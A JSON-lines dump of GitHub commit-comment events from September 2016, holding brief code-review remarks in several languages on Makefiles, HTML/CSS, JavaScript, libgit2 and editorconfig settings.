{"id":"4557046153","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":19005378,"position":42,"line":42,"path":"templates/base_awesome/css/template-core.css","commit_id":"ef288b91e117e90551d78cbb35ce851dfa579b16","created_at":"2016-09-13T17:23:38Z","updated_at":"2016-09-13T17:23:38Z","body":"I 2.50 views : you have a <div class=\"no-more-tables\"> <table class=\"table\"> in view. I want to remove this div.\r\n\r\nLike <div class=\"table-responsive><table class=\"table\"> in bootsrap.\r\n\r\nThen \r\n`<div class=\"answers-wraper no-more-tables\">{ANSWERS}</div>`\r\ndoes the trick\r\n"}},"created_at":"2016-09-13T17:23:38Z"}
{"id":"4557048191","type":"CommitCommentEvent","actor":{"login":"baoson2211"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19005384,"position":63,"line":91,"path":"ADC_USART1/Makefile","commit_id":"84596a63527c37594d48ced219734e34a61c6c8c","created_at":"2016-09-13T17:24:00Z","updated_at":"2016-09-13T17:24:00Z","body":"Sai tên thư mục. Tên đúng là 'src' không phải 'Src'"}},"created_at":"2016-09-13T17:24:00Z"}
{"id":"4557049146","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":19005389,"position":42,"line":42,"path":"templates/base_awesome/css/template-core.css","commit_id":"ef288b91e117e90551d78cbb35ce851dfa579b16","created_at":"2016-09-13T17:24:12Z","updated_at":"2016-09-13T17:24:12Z","body":"And the label.sr-only need to be shown :)"}},"created_at":"2016-09-13T17:24:12Z"}
{"id":"4557049404","type":"CommitCommentEvent","actor":{"login":"eddyem"},"repo":{"name":"eddyem/eddys_snippets"},"payload":{"comment":{"id":19005392,"position":null,"line":null,"path":null,"commit_id":"0d31099644adf8fd857c48d4ac05ee460673d073","created_at":"2016-09-13T17:24:14Z","updated_at":"2016-09-13T17:24:14Z","body":"Check it inside mounted partitions (especially with `mount -o bind`)."}},"created_at":"2016-09-13T17:24:14Z"}
{"id":"4557053320","type":"CommitCommentEvent","actor":{"login":"baoson2211"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19005409,"position":64,"line":92,"path":"ADC_USART1/Makefile","commit_id":"84596a63527c37594d48ced219734e34a61c6c8c","created_at":"2016-09-13T17:24:56Z","updated_at":"2016-09-13T17:24:56Z","body":"Sai tên, tên đúng là 'system_stm32f10x.c', không phải là 'system_stm32f1xx.c'"}},"created_at":"2016-09-13T17:24:56Z"}
{"id":"4557054316","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":19005414,"position":null,"line":null,"path":null,"commit_id":"ddc0d5ee736daa946d1a4c03d150d8e89baf9bd4","created_at":"2016-09-13T17:25:09Z","updated_at":"2016-09-13T17:25:09Z","body":"@aconanlai  I'm thinking that we could required our react libraries from a cdn for now, to keep our bundle tighter... What do you think? (Obviously not the audio player code, just `react` `react-router` `react-redux`, etc...\r\n\r\nhttps://cdnjs.com/"}},"created_at":"2016-09-13T17:25:09Z"}
{"id":"4557057264","type":"CommitCommentEvent","actor":{"login":"codekoala"},"repo":{"name":"ash2k/backoff"},"payload":{"comment":{"id":19005424,"position":null,"line":null,"path":null,"commit_id":"f9480192ecece9e8585c07c8177eab5a97b738e1","created_at":"2016-09-13T17:25:41Z","updated_at":"2016-09-13T17:25:41Z","body":"Nevermind. I just found https://github.com/cenk/backoff/pull/28. Meh."}},"created_at":"2016-09-13T17:25:41Z"}
{"id":"4557061944","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19005434,"position":1,"line":0,"path":"libraries/stdlib/src/kotlin/collections/AbstractMap.kt","commit_id":"683b5f315c33370a8357809b5aeb35650a7a44ec","created_at":"2016-09-13T17:26:31Z","updated_at":"2016-09-13T17:26:31Z","body":"|`line 102`|\n|---|\nAnd neither does GWT, but I cannot find the reason why they could not be implemented according to structural equality?"}},"created_at":"2016-09-13T17:26:31Z"}
{"id":"4557062541","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19005437,"position":null,"line":null,"path":null,"commit_id":"67d2d3855f604a3e4559a959bbb92f83a894824c","created_at":"2016-09-13T17:26:39Z","updated_at":"2016-09-13T17:26:39Z","body":"I didn't know. I just knew that a MIX of tabs and spaces are lethal because Python may not see the same indentation as I do, and `.editorconfig` said there should be tabs.\r\n\r\nI'll revert it right now and change `.editorconfig` so all python files are specified as using spaces."}},"created_at":"2016-09-13T17:26:39Z"}
{"id":"4557063365","type":"CommitCommentEvent","actor":{"login":"jgianpiere"},"repo":{"name":"jgianpiere/uno"},"payload":{"comment":{"id":19005441,"position":null,"line":null,"path":null,"commit_id":"7e8249f5a345d3b8d39d39ecd924a49a456f7d36","created_at":"2016-09-13T17:26:47Z","updated_at":"2016-09-13T17:26:47Z","body":"jm"}},"created_at":"2016-09-13T17:26:47Z"}
{"id":"4557066184","type":"CommitCommentEvent","actor":{"login":"nickuraltsev"},"repo":{"name":"mzabriskie/axios"},"payload":{"comment":{"id":19005450,"position":null,"line":null,"path":null,"commit_id":"4c4e648f409de9cddc1b392b7695d5e4864fa561","created_at":"2016-09-13T17:27:15Z","updated_at":"2016-09-13T17:27:15Z","body":"@tony-kerz `Object` is actually a function. JavaScript functions inherit from `Object.prototype`, hence you can use `Object.hasOwnProperty`. The following code will also work:\r\n\r\n```js\r\nfunction func() {\r\n}\r\n\r\nfunc.hasOwnProperty.call(obj, key);\r\n```\r\n\r\nAnd this code will work as well:\r\n\r\n```js\r\n\"foo\".hasOwnProperty.call(obj, key); // because strings also inherit from `Object.prototype`\r\ntrue.hasOwnProperty.call(obj, key); // the same applies to booleans, etc.\r\n```\r\n\r\nUsing `Object.hasOwnProperty` is the same as using `true.hasOwnProperty` - it will work because functions and booleans inherit from  `Object.prototype`, but it's hacky. \r\n\r\nDoes it make sense?"}},"created_at":"2016-09-13T17:27:15Z"}
{"id":"4557068121","type":"CommitCommentEvent","actor":{"login":"baoson2211"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19005457,"position":71,"line":98,"path":"ADC_USART1/Makefile","commit_id":"84596a63527c37594d48ced219734e34a61c6c8c","created_at":"2016-09-13T17:27:34Z","updated_at":"2016-09-13T17:27:34Z","body":"Sai vị trí đặt linked file, STM32F103VE_FLASH.ld đặt cùng thư mục với Makefiles chứ có đặt trong thư mục nào khác đâu"}},"created_at":"2016-09-13T17:27:34Z"}
{"id":"4557070299","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19005469,"position":null,"line":null,"path":null,"commit_id":"aa4cb5a772ef3bc838c47a9262bdaad05561baec","created_at":"2016-09-13T17:27:57Z","updated_at":"2016-09-13T17:27:57Z","body":"The following doc(s) have been deployed to the [1884drush](https://1884drush-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/drush-versions](https://1884drush-static-docs.pantheonsite.io/docs/drush-versions)\n- [docs/pantheon-yml](https://1884drush-static-docs.pantheonsite.io/docs/pantheon-yml)\n- [docs/php-versions](https://1884drush-static-docs.pantheonsite.io/docs/php-versions)\n"}},"created_at":"2016-09-13T17:27:57Z"}
{"id":"4557070565","type":"CommitCommentEvent","actor":{"login":"Omega094"},"repo":{"name":"nirvananoob/leetcode"},"payload":{"comment":{"id":19005472,"position":null,"line":null,"path":null,"commit_id":"ea69742e6b25f4ec7d52d2dd97349f98d8fe5f16","created_at":"2016-09-13T17:28:00Z","updated_at":"2016-09-13T17:28:00Z","body":"强无敌"}},"created_at":"2016-09-13T17:28:00Z"}
{"id":"4557070839","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":19005474,"position":null,"line":null,"path":null,"commit_id":"ddc0d5ee736daa946d1a4c03d150d8e89baf9bd4","created_at":"2016-09-13T17:28:04Z","updated_at":"2016-09-13T17:28:04Z","body":"Thinking about it, I don't really know how we include these atm"}},"created_at":"2016-09-13T17:28:04Z"}
{"id":"4557074268","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19005483,"position":41,"line":121,"path":"src/pocketmine/level/ChunkManager.php","commit_id":"e57a7e7bafdcd74e7962b59f5ac2e889e05787e5","created_at":"2016-09-13T17:28:42Z","updated_at":"2016-09-13T17:28:42Z","body":"Already removed. "}},"created_at":"2016-09-13T17:28:42Z"}
{"id":"4557076227","type":"CommitCommentEvent","actor":{"login":"lunks"},"repo":{"name":"cuducos/cunhajacaiu"},"payload":{"comment":{"id":19005487,"position":null,"line":null,"path":null,"commit_id":"2332d1fabbcb79fca2af3933ebb797c4e80fd5f4","created_at":"2016-09-13T17:29:03Z","updated_at":"2016-09-13T17:29:03Z","body":"🎉 "}},"created_at":"2016-09-13T17:29:03Z"}
{"id":"4557079551","type":"CommitCommentEvent","actor":{"login":"baoson2211"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19005496,"position":70,"line":94,"path":"ADC_USART1/Makefile","commit_id":"84596a63527c37594d48ced219734e34a61c6c8c","created_at":"2016-09-13T17:29:37Z","updated_at":"2016-09-13T17:29:37Z","body":"Viết sai rồi **\"/$(PROJ_NAME)/STM32F103VE_FLASH.ld\"** ở đây có nghĩa là **\"/ADC_USART1/STM32F103VE_FLASH.ld\"**. \r\nTrong thư mục **\"/\"** làm gì có thư mục con nào tên là **\"ADC_USART1/\"**"}},"created_at":"2016-09-13T17:29:37Z"}
{"id":"4557079754","type":"CommitCommentEvent","actor":{"login":"avigad"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19005498,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-13T17:29:39Z","updated_at":"2016-09-13T17:29:39Z","body":"I like it. :+1: "}},"created_at":"2016-09-13T17:29:39Z"}
{"id":"4557088961","type":"CommitCommentEvent","actor":{"login":"xuan-72"},"repo":{"name":"libgit2/libgit2"},"payload":{"comment":{"id":19005518,"position":null,"line":null,"path":null,"commit_id":"2749ff46d8db3fae270334cace82201d49e38c54","created_at":"2016-09-13T17:31:14Z","updated_at":"2016-09-13T17:31:14Z","body":"> @@ -59,6 +59,12 @@ typedef size_t size_t;\r\n>  #define GIT_WIN32 1\r\n>  #endif\r\n>  \r\n> +#if defined(__has_feature)\r\n> +#if __has_feature(address_sanitizer)\r\n> +#define GIT_ASAN 1"}},"created_at":"2016-09-13T17:31:14Z"}
{"id":"4557093124","type":"CommitCommentEvent","actor":{"login":"sneak"},"repo":{"name":"steemit/steem"},"payload":{"comment":{"id":19005525,"position":22,"line":15,"path":"doc/git-guildelines.md","commit_id":"4537fa1bb7d880819c5193aaddc14921d002da9a","created_at":"2016-09-13T17:31:58Z","updated_at":"2016-09-13T17:31:58Z","body":"PRs are themselves issues, so perhaps the branch naming scheme for these should just be `feature/YYYYMMDD-shortname`, e.g. \r\n\r\n`feature/20160913-sneak-hotfix`\r\n\r\n(The idea behind putting dates in branch names is so that we can prune old/stale ones to keep the repo tidy.)\r\n"}},"created_at":"2016-09-13T17:31:58Z"}
{"id":"4557094789","type":"CommitCommentEvent","actor":{"login":"baoson2211"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19005530,"position":76,"line":101,"path":"ADC_USART1/Makefile","commit_id":"84596a63527c37594d48ced219734e34a61c6c8c","created_at":"2016-09-13T17:32:18Z","updated_at":"2016-09-13T17:32:18Z","body":"**\"USE_STDPERIPH_DRIVER\"** chứ không phải là \"USE_STD_DRIVER\".\r\nKhông tin xem trong **\"system/include/cmsis/stm32f10x.h\"** dòng **99**"}},"created_at":"2016-09-13T17:32:18Z"}
{"id":"4557096394","type":"CommitCommentEvent","actor":{"login":"gdi2290"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":19005534,"position":null,"line":null,"path":null,"commit_id":"94e95a2bcb157657ce09e241386a0f526059ee0c","created_at":"2016-09-13T17:32:36Z","updated_at":"2016-09-13T17:32:36Z","body":"@wiewioraseb remove your node_modules make sure you're using npm 3 and run `npm cache clean`"}},"created_at":"2016-09-13T17:32:36Z"}
{"id":"4557098956","type":"CommitCommentEvent","actor":{"login":"baoson2211"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19005542,"position":103,"line":132,"path":"ADC_USART1/Makefile","commit_id":"84596a63527c37594d48ced219734e34a61c6c8c","created_at":"2016-09-13T17:33:05Z","updated_at":"2016-09-13T17:33:05Z","body":"bỏ cái -HD đi"}},"created_at":"2016-09-13T17:33:05Z"}
{"id":"4557099952","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005545,"position":142,"line":149,"path":"src/html/index.html","commit_id":"bff258cfb349989ca6b9bc4d7dfcbdb2252e6fa7","created_at":"2016-09-13T17:33:16Z","updated_at":"2016-09-13T17:33:16Z","body":"CSS ska inte stå i HTML:en! Fusk! Jag vet att jag gjorde de men de e fel :p "}},"created_at":"2016-09-13T17:33:16Z"}
{"id":"4557100213","type":"CommitCommentEvent","actor":{"login":"josephgknox"},"repo":{"name":"SU-SWS/stanford_toggle_block"},"payload":{"comment":{"id":19005546,"position":null,"line":null,"path":null,"commit_id":"f4ed75d323d5f962c9be488d941231cf39158c48","created_at":"2016-09-13T17:33:19Z","updated_at":"2016-09-13T17:33:19Z","body":"@sherakama could use your assistance with items 1 and 2"}},"created_at":"2016-09-13T17:33:19Z"}
{"id":"4557100901","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19005547,"position":12,"line":609,"path":"common/src/main/java/com/frostwire/bittorrent/jlibtorrent/SessionManager.java","commit_id":"6ef98eb5992f6bd73be7b3da9de70db16c3f9359","created_at":"2016-09-13T17:33:26Z","updated_at":"2016-09-13T17:33:26Z","body":"what's the reason we use an array of byte arrays if it's only going to have a single byte array and then we're just going to return that byte array at the end? `return data[0]`, why not use a simple byte array?"}},"created_at":"2016-09-13T17:33:26Z"}
{"id":"4557102962","type":"CommitCommentEvent","actor":{"login":"clarajohana"},"repo":{"name":"bayuelo/camaleon"},"payload":{"comment":{"id":19005558,"position":null,"line":null,"path":null,"commit_id":"286a9af5acde2d8905a486d6f5e382fa93d84764","created_at":"2016-09-13T17:33:49Z","updated_at":"2016-09-13T17:33:49Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;uwuPCtVu&#x2F;21-modulo-materia-prima-interfaz-grafica\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Módulo Materia Prima - Interfaz Gráfica</a>"}},"created_at":"2016-09-13T17:33:49Z"}
{"id":"4557104981","type":"CommitCommentEvent","actor":{"login":"sneak"},"repo":{"name":"steemit/steem"},"payload":{"comment":{"id":19005567,"position":44,"line":37,"path":"doc/git-guildelines.md","commit_id":"4537fa1bb7d880819c5193aaddc14921d002da9a","created_at":"2016-09-13T17:34:12Z","updated_at":"2016-09-13T17:34:12Z","body":"All updates to `master` are done via PRs too."}},"created_at":"2016-09-13T17:34:12Z"}
{"id":"4557109143","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005582,"position":128,"line":133,"path":"src/html/index.html","commit_id":"bff258cfb349989ca6b9bc4d7dfcbdb2252e6fa7","created_at":"2016-09-13T17:34:57Z","updated_at":"2016-09-13T17:34:57Z","body":"Massa upprepningar. Istället kan du kedja dem såhär: a:visited, a:hover, a:active"}},"created_at":"2016-09-13T17:34:57Z"}
{"id":"4557110662","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19005588,"position":null,"line":null,"path":null,"commit_id":"8f2cde7d8f4c46be7a565687b8444c26fcb4386c","created_at":"2016-09-13T17:35:15Z","updated_at":"2016-09-13T17:35:15Z","body":"Please Mike aka Rythal :) write better commit titles, this helps in later maintance of repository. Thanks +1: "}},"created_at":"2016-09-13T17:35:15Z"}
{"id":"4557111661","type":"CommitCommentEvent","actor":{"login":"xuan-72"},"repo":{"name":"libgit2/libgit2"},"payload":{"comment":{"id":19005589,"position":null,"line":null,"path":null,"commit_id":"2749ff46d8db3fae270334cace82201d49e38c54","created_at":"2016-09-13T17:35:25Z","updated_at":"2016-09-13T17:35:25Z","body":"Tags can be pushed explicitly:\r\n\r\npushing refs/tags/<tagname> will transfer the corresponding tagname to the remote.\r\nThis can be used (in conjunction with listing all tagnames) to implement git push --tags"}},"created_at":"2016-09-13T17:35:25Z"}
{"id":"4557115546","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19005595,"position":12,"line":609,"path":"common/src/main/java/com/frostwire/bittorrent/jlibtorrent/SessionManager.java","commit_id":"6ef98eb5992f6bd73be7b3da9de70db16c3f9359","created_at":"2016-09-13T17:36:09Z","updated_at":"2016-09-13T17:36:09Z","body":"because this is a listener and the variable must be final, then the trick of a \"final mutable\" object"}},"created_at":"2016-09-13T17:36:09Z"}
{"id":"4557116030","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005599,"position":104,"line":109,"path":"src/html/index.html","commit_id":"bff258cfb349989ca6b9bc4d7dfcbdb2252e6fa7","created_at":"2016-09-13T17:36:14Z","updated_at":"2016-09-13T17:36:14Z","body":"Ge denna en klass istället. Risken är om du använder section igen så förstör de din layout"}},"created_at":"2016-09-13T17:36:14Z"}
{"id":"4557118973","type":"CommitCommentEvent","actor":{"login":"baoson2211"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19005607,"position":65,"line":93,"path":"ADC_USART1/Makefile","commit_id":"84596a63527c37594d48ced219734e34a61c6c8c","created_at":"2016-09-13T17:36:46Z","updated_at":"2016-09-13T17:36:46Z","body":"add thêm vào, sau này dùng."}},"created_at":"2016-09-13T17:36:46Z"}
{"id":"4557119892","type":"CommitCommentEvent","actor":{"login":"CineXWorm"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":19005610,"position":null,"line":null,"path":null,"commit_id":"8604b50cd6289428d8d6eead9976ece092ad651d","created_at":"2016-09-13T17:36:56Z","updated_at":"2016-09-13T17:36:56Z","body":"How to give myself pokeballs?"}},"created_at":"2016-09-13T17:36:56Z"}
{"id":"4557123506","type":"CommitCommentEvent","actor":{"login":"licaon-kter"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19005620,"position":null,"line":null,"path":null,"commit_id":"706a751891fb6059d330b0615b574dbe82904d90","created_at":"2016-09-13T17:37:36Z","updated_at":"2016-09-13T17:37:36Z","body":"Confirming that it bugs out on Xperia 5.1.1."}},"created_at":"2016-09-13T17:37:36Z"}
{"id":"4557126883","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005629,"position":98,"line":103,"path":"src/html/index.html","commit_id":"bff258cfb349989ca6b9bc4d7dfcbdb2252e6fa7","created_at":"2016-09-13T17:38:15Z","updated_at":"2016-09-13T17:38:15Z","body":"Hm, bara utifrån att läsa din kod så känns det inte som du behöver varken margin eller display; men jag kan ha fel"}},"created_at":"2016-09-13T17:38:15Z"}
{"id":"4557127450","type":"CommitCommentEvent","actor":{"login":"xuan-72"},"repo":{"name":"libgit2/libgit2"},"payload":{"comment":{"id":19005630,"position":null,"line":null,"path":null,"commit_id":"2749ff46d8db3fae270334cace82201d49e38c54","created_at":"2016-09-13T17:38:21Z","updated_at":"2016-09-13T17:38:21Z","body":"In src/revwalk.c:\r\n\r\n>  \r\n> -\treturn 0;\r\n> +\r\n> +\twhile (parents) {\r\n> +\t\tgit_commit_list_node *commit = git_commit_list_pop(&parents);\r\n> +\r\n> +\t\twhile (commit) {\r\nIt looks great I like it..."}},"created_at":"2016-09-13T17:38:21Z"}
{"id":"4557131250","type":"CommitCommentEvent","actor":{"login":"sherakama"},"repo":{"name":"SU-SWS/stanford_toggle_block"},"payload":{"comment":{"id":19005637,"position":null,"line":null,"path":null,"commit_id":"f4ed75d323d5f962c9be488d941231cf39158c48","created_at":"2016-09-13T17:39:06Z","updated_at":"2016-09-13T17:39:06Z","body":"Roger roger\r\n"}},"created_at":"2016-09-13T17:39:06Z"}
{"id":"4557133296","type":"CommitCommentEvent","actor":{"login":"st3no"},"repo":{"name":"st3no/NoteNoob"},"payload":{"comment":{"id":19005641,"position":null,"line":null,"path":null,"commit_id":"9fb64f003515e0e12458cfbcc7b436dd41fadceb","created_at":"2016-09-13T17:39:27Z","updated_at":"2016-09-13T17:39:27Z","body":"bho"}},"created_at":"2016-09-13T17:39:27Z"}
{"id":"4557135155","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005644,"position":137,"line":146,"path":"src/html/index.html","commit_id":"bff258cfb349989ca6b9bc4d7dfcbdb2252e6fa7","created_at":"2016-09-13T17:39:47Z","updated_at":"2016-09-13T17:39:47Z","body":"Wrappa alltid din meny i en <nav> tagg"}},"created_at":"2016-09-13T17:39:47Z"}
{"id":"4557137415","type":"CommitCommentEvent","actor":{"login":"ghsr"},"repo":{"name":"ghsr/proprietary_vendor_samsung_galaxys2plus-common"},"payload":{"comment":{"id":19005654,"position":null,"line":null,"path":null,"commit_id":"47e446dfed2ba543602e8e962aa0f9a064cd537d","created_at":"2016-09-13T17:40:13Z","updated_at":"2016-09-13T17:40:13Z","body":"Yes, hotspot works and so far no problems with wifi.\r\nI had problems with hotspot on cm-12.1, but they have been fixed by this patch - https://github.com/ghsr/android_device_samsung_i9105p/commit/13e399322de3dc75e438e7dec9670c674726c58f\r\nMaybe you can upload logcat?"}},"created_at":"2016-09-13T17:40:13Z"}
{"id":"4557137477","type":"CommitCommentEvent","actor":{"login":"AndyBauleni"},"repo":{"name":"AndyBauleni/datasciencecoursera"},"payload":{"comment":{"id":19005655,"position":null,"line":null,"path":null,"commit_id":"49a424c5a044490ad55c06677b6e64844ae9d54b","created_at":"2016-09-13T17:40:14Z","updated_at":"2016-09-13T17:40:14Z","body":"Assignment 2"}},"created_at":"2016-09-13T17:40:14Z"}
{"id":"4557137722","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19005656,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T17:40:17Z","updated_at":"2016-09-13T17:40:17Z","body":"https://github.com/deepstreamIO/deepstream.io/blob/2eafdf24c90d074ff740cfdf14e35c355ebae25b/src/message/connection-endpoint.js#L64-L68 😉 "}},"created_at":"2016-09-13T17:40:17Z"}
{"id":"4557139097","type":"CommitCommentEvent","actor":{"login":"Liamsi"},"repo":{"name":"dedis/cothority"},"payload":{"comment":{"id":19005659,"position":58,"line":103,"path":"services/swupdate/simulation_flood.go","commit_id":"82fa685c86bc42859cd23a85f00ed683c27bece9","created_at":"2016-09-13T17:40:30Z","updated_at":"2016-09-13T17:40:30Z","body":"Of course, makes sense (this is still work in progress). If you want to do early reviews: There are also many other hardcoded things on the swupdate_3 branch (which is used/merged here)."}},"created_at":"2016-09-13T17:40:30Z"}
{"id":"4557144344","type":"CommitCommentEvent","actor":{"login":"cmbant"},"repo":{"name":"cmbant/CAMB"},"payload":{"comment":{"id":19005674,"position":null,"line":null,"path":null,"commit_id":"3018e4b073afb4cd1038e6110417321dbec85d2e","created_at":"2016-09-13T17:41:26Z","updated_at":"2016-09-13T17:41:26Z","body":"Probably a gfortran bug - which version? (try with latest version 6?)"}},"created_at":"2016-09-13T17:41:26Z"}
{"id":"4557145195","type":"CommitCommentEvent","actor":{"login":"chriswininger"},"repo":{"name":"chriswininger/Derp-Learning"},"payload":{"comment":{"id":19005679,"position":null,"line":null,"path":null,"commit_id":"7e6d1a5033885491d33de30c496b2e0fc6d4a1d4","created_at":"2016-09-13T17:41:35Z","updated_at":"2016-09-13T17:41:35Z","body":"Ah there we go, sorry couldn't figure out where you were talking about. I didn't even know that field was there. Thanks. Also I think I've turned on issue tracking now."}},"created_at":"2016-09-13T17:41:35Z"}
{"id":"4557145213","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005681,"position":65,"line":72,"path":"src/html/index.html","commit_id":"bff258cfb349989ca6b9bc4d7dfcbdb2252e6fa7","created_at":"2016-09-13T17:41:35Z","updated_at":"2016-09-13T17:41:35Z","body":"Varför använder du position relative här? Den verkar inte göra något"}},"created_at":"2016-09-13T17:41:35Z"}
{"id":"4557147848","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19005687,"position":null,"line":null,"path":null,"commit_id":"67d2d3855f604a3e4559a959bbb92f83a894824c","created_at":"2016-09-13T17:42:03Z","updated_at":"2016-09-13T17:42:03Z","body":"Fixed in 7647afd"}},"created_at":"2016-09-13T17:42:03Z"}
{"id":"4557148793","type":"CommitCommentEvent","actor":{"login":"adennie"},"repo":{"name":"Affectiva/affdexme-android"},"payload":{"comment":{"id":19005688,"position":null,"line":null,"path":null,"commit_id":"2814476a36adb3501d18f4e9ac84ad001d7e648a","created_at":"2016-09-13T17:42:14Z","updated_at":"2016-09-13T17:42:14Z","body":"the commit comment is not correct, sorry.  This commit removes the license info in the README."}},"created_at":"2016-09-13T17:42:14Z"}
{"id":"4557149128","type":"CommitCommentEvent","actor":{"login":"tony-kerz"},"repo":{"name":"mzabriskie/axios"},"payload":{"comment":{"id":19005689,"position":null,"line":null,"path":null,"commit_id":"4c4e648f409de9cddc1b392b7695d5e4864fa561","created_at":"2016-09-13T17:42:17Z","updated_at":"2016-09-13T17:42:17Z","body":"yes, that makes sense. \r\n\r\nso, approaching via `Object.prototype` is not only (negligibly) faster because it skips navigating the prototype chain, but more importantly, it's just a more direct and obvious way of getting to the `hasOwnProperty` function.\r\n\r\nthanks nick!"}},"created_at":"2016-09-13T17:42:17Z"}
{"id":"4557150786","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19005696,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T17:42:35Z","updated_at":"2016-09-13T17:42:35Z","body":"I don't get it?"}},"created_at":"2016-09-13T17:42:35Z"}
{"id":"4557151278","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005698,"position":45,"line":57,"path":"src/html/index.html","commit_id":"bff258cfb349989ca6b9bc4d7dfcbdb2252e6fa7","created_at":"2016-09-13T17:42:41Z","updated_at":"2016-09-13T17:42:41Z","body":"Lite överflödigt. Backgrunden är alltid vit per default"}},"created_at":"2016-09-13T17:42:41Z"}
{"id":"4557151417","type":"CommitCommentEvent","actor":{"login":"9one9"},"repo":{"name":"9one9/Car-wash-site"},"payload":{"comment":{"id":19005699,"position":null,"line":null,"path":null,"commit_id":"a56555ebd95d4637a1265372eaa2f01c91d12bce","created_at":"2016-09-13T17:42:42Z","updated_at":"2016-09-13T17:42:42Z","body":"https://9one9.github.io/Car-wash-site/"}},"created_at":"2016-09-13T17:42:42Z"}
{"id":"4557154058","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19005705,"position":8,"line":16,"path":".editorconfig","commit_id":"7647afd12ee16ae405d27c374ac69f29b40824ec","created_at":"2016-09-13T17:43:12Z","updated_at":"2016-09-13T17:43:12Z","body":"Lines 13-16 was redundant, same is specified for `[*]`"}},"created_at":"2016-09-13T17:43:12Z"}
{"id":"4557155106","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005710,"position":19,"line":27,"path":"src/html/index.html","commit_id":"bff258cfb349989ca6b9bc4d7dfcbdb2252e6fa7","created_at":"2016-09-13T17:43:22Z","updated_at":"2016-09-13T17:43:22Z","body":"Onödigt."}},"created_at":"2016-09-13T17:43:22Z"}
{"id":"4557158699","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005718,"position":21,"line":28,"path":"src/html/index.html","commit_id":"bff258cfb349989ca6b9bc4d7dfcbdb2252e6fa7","created_at":"2016-09-13T17:44:00Z","updated_at":"2016-09-13T17:44:00Z","body":"Vad gör denna här? Den verkar inte göra någonting."}},"created_at":"2016-09-13T17:44:00Z"}
{"id":"4557160779","type":"CommitCommentEvent","actor":{"login":"JamesCraster"},"repo":{"name":"JamesCraster/Dijkstra"},"payload":{"comment":{"id":19005725,"position":null,"line":null,"path":null,"commit_id":"ce53071b29d63b931ea0243ed2c32b6c29e09374","created_at":"2016-09-13T17:44:23Z","updated_at":"2016-09-13T17:44:23Z","body":"The black represents impassable nodes. "}},"created_at":"2016-09-13T17:44:23Z"}
